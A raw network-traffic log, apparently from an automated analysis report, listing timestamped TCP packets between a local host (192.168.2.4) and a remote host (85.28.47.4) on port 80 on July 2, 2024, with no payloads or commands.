                                            Jul 2, 2024 08:26:22.194741011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194803953 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194813013 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194823027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194833994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194849968 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194875002 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.194935083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.194977045 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195064068 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195075035 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195086002 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195096970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195106983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195112944 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195120096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195131063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195138931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195162058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195171118 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195322990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195339918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195349932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195378065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195394993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195394993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195533037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195543051 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195553064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195580959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195602894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195723057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195734024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195744991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195755959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195766926 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195766926 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195776939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195780993 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195785999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195796967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.195807934 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195826054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.195846081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196059942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196070910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196085930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196105003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196115971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196121931 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196305990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196316004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196326017 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196335077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196346045 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196350098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196357012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196367025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196372986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196377039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196387053 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196391106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196397066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196403980 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196409941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196420908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196435928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196461916 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196841955 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196852922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196861982 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.196896076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.196990967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197000027 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197010040 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197021008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197030067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197036028 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197041988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197053909 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197060108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197069883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197071075 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197079897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197088957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197098970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197105885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197115898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197120905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197127104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197138071 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197145939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197153091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197164059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197164059 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197194099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.197779894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197789907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.197827101 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.270682096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270721912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270734072 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270791054 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.270840883 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.270863056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270874977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270885944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270895958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.270901918 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.270929098 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.276880980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.276927948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.276932955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.276940107 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.276964903 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.276982069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277041912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277074099 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277138948 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277149916 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277159929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277170897 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277184010 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277209997 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277306080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277348995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277405977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277422905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277434111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277445078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277451038 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277456999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277462959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277491093 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277774096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277785063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277796030 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277806997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277817011 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277817011 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277828932 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277837992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277839899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.277854919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.277875900 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278162003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278172970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278208017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278356075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278367043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278377056 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278388023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278398037 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278403044 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278409004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278417110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278419971 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278429985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278431892 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278440952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278451920 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278460026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278487921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.278945923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278956890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278968096 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.278990030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.279002905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283368111 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283377886 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283389091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283418894 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283444881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283468962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283478975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283488989 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283503056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283524036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283649921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283662081 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283672094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283684015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283694029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283708096 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283865929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283876896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283886909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283899069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283909082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.283909082 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283929110 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.283946037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284081936 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284094095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284104109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284115076 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284126043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284147978 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284260988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284272909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284282923 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284295082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284302950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284317017 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284338951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284445047 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284461975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284496069 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284502983 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284589052 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284600019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284610987 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284621954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284631014 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284631968 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284642935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284652948 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284662008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284670115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284693003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284843922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284893036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284909964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284920931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284931898 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.284944057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.284960032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285114050 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285124063 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285140991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285151958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285157919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285166025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285171032 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285181999 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285192966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285197973 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285204887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285217047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285240889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285573006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285583019 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285593033 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285604000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285614967 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285618067 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285625935 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285633087 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285636902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285646915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285648108 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285657883 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.285671949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.285693884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.620188951 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.620225906 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:22.625176907 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.625193119 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.625201941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.625211954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:22.625221014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:23.354068995 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:23.354131937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:23.455642939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:23.455677986 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:23.460501909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:23.460516930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:23.460613012 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:24.269479990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:24.269601107 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:24.282278061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:24.287127972 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:25.063440084 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:25.063524961 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:25.427931070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:25.432789087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.133760929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.134011030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.315326929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.320209026 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497540951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497562885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497581959 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497617006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497642994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497649908 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497658014 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497683048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497705936 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497782946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497796059 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497808933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497821093 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497822046 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497836113 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497838974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.497858047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.497881889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.498059988 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.498075962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.498100042 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.498120070 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.498128891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.498140097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.498177052 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.579742908 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579793930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579806089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579869032 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579886913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579950094 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.579951048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.579951048 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.579988003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.579998970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580012083 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580023050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580159903 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580172062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580183983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580195904 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580203056 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580207109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580219030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580245972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580429077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580471992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580558062 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580569983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580584049 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580590963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580596924 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580601931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580602884 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580607891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580626965 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580642939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.580946922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.580965996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.581006050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.581068039 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.581079006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.581151962 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.586401939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.586464882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:26.662235022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662297010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:26.662309885 CEST806388085.28.47.4192.168.2.4
